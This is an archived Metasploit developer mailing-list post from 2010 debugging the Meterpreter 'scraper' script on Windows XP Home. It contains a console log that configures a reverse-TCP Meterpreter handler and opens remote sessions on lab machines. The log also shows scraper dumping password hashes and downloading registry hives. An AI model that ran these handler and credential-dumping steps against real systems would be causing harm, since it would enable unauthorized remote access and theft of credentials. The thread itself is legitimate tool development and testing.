Metasploit mailing list archives
Re: Scraper problem
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Mon, 12 Jul 2010 08:26:18 -0400
I was able to replicate the problem on a Home System but not on a Professional System, first machine is a WinXP SP2 Home and the second a WinXP SP2 Pro. Matt could you please open a ticket at http://www.metasploit.com/redmine/projects/framework/issues/new Thanks, Carlos _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ metasploit v3.4.1-release [core:3.4 api:1.0] + -- --=[ 566 exploits - 282 auxiliary + -- --=[ 210 payloads - 27 encoders - 8 nops =[ svn r9785 updated today (2010.07.11) resource (resource/meterpreter_api.rc)> use exploit/multi/handler resource (resource/meterpreter_api.rc)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (resource/meterpreter_api.rc)> set LHOST 192.168.1.100 LHOST => 192.168.1.100 resource (resource/meterpreter_api.rc)> set ExitOnSession false ExitOnSession => false resource (resource/meterpreter_api.rc)> exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.100:4444 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (748032 bytes) to 192.168.1.234 [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.234:1038) at Mon Jul 12 08:20:54 -0400 2010 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: CARLOS-B357C681\Owner meterpreter > sysinfo Computer: CARLOS-B357C681 OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > run scraper [*] New session on 192.168.1.234:1038... [*] Gathering basic system information... [*] Exception: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 2 /Users/cperez/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'/Users/cperez/trunk/lib/rex/script/base.rb:83:in `m_exec'/Users/cperez/trunk/lib/rex/script/base.rb:166:in `run'/Users/cperez/trunk/lib/rex/script/base.rb:165:in `open'/Users/cperez/trunk/lib/rex/script/base.rb:165:in `run'/Users/cperez/trunk/lib/rex/script/base.rb:41:in `run'/Users/cperez/trunk/lib/rex/post/meterpreter/client.rb:183:in `execute_file'/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:182:in `execute_script'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:348:in `cmd_run'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:101:in `run_command'/Users/cperez/trunk/lib/rex/ui/text/disp atcher_shell.rb:208:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:67/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `call'/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `run'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:65:in `interact'/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:233:in `_interact'/Users/cperez/trunk/lib/rex/ui/interactive.rb:48:in `interact'/Users/cperez/trunk/lib/msf/ui/console/command_dispatcher/core.rb:1217:in `cmd_sessions'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/Users/cperez/trunk/lib/rex/ui/text/dispatche r_shell.rb:202:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/shell.rb:141:in `run'./msfconsole:112 meterpreter > [*] Sending stage (748032 bytes) to 192.168.1.220 [*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.220:11105) at Mon Jul 12 08:22:10 -0400 2010 meterpreter > background msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > run scraper [*] New session on 192.168.1.220:11105... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\XulAaohn.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yKjsYnyS.reg) On Jul 12, 2010, at 6:59 AM, Matt Gardenghi wrote:
HD, the console is run by root and the target victim is the only user on the machine. That puts him as Administrator. Calos, I'll need to test tonight when I get home. I cleaned up the BT4 svn and tried again this morning with the same results. Tonight I'll try to rebuild my stripped down Ubuntu VM and run the old school install procedure instead of the newer installer and see if that makes a difference. It failed on that machine as well. Matt On 7/11/2010 10:34 PM, HD Moore wrote:On 7/11/2010 7:37 PM, Carlos Perez wrote:OK just tested on Win XP Pro with SP1, SP2 and SP3 with Ruby 1.8.7 and 1.9.1 and I could not replicate the problem , Downloading WinXP Home SP2 right now to test. please clear your cache and svn up to make sure it is not a cached library while I set XP home for test.Based on the error message (operation failed: 2), my guess is the user account it was run with is a limited user and not an admin. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Scraper problem Matt Gardenghi (Jul 11)
- Re: Scraper problem Carlos Perez (Jul 11)
- Re: Scraper problem Matt Gardenghi (Jul 11)
- Re: Scraper problem Carlos Perez (Jul 11)
- Re: Scraper problem HD Moore (Jul 11)
- Re: Scraper problem Matt Gardenghi (Jul 12)
- Re: Scraper problem Matt Gardenghi (Jul 12)
- Re: Scraper problem Carlos Perez (Jul 12)
- Re: Scraper problem Carlos Perez (Jul 12)
- Re: Scraper problem Matt Gardenghi (Jul 11)
- Re: Scraper problem Carlos Perez (Jul 11)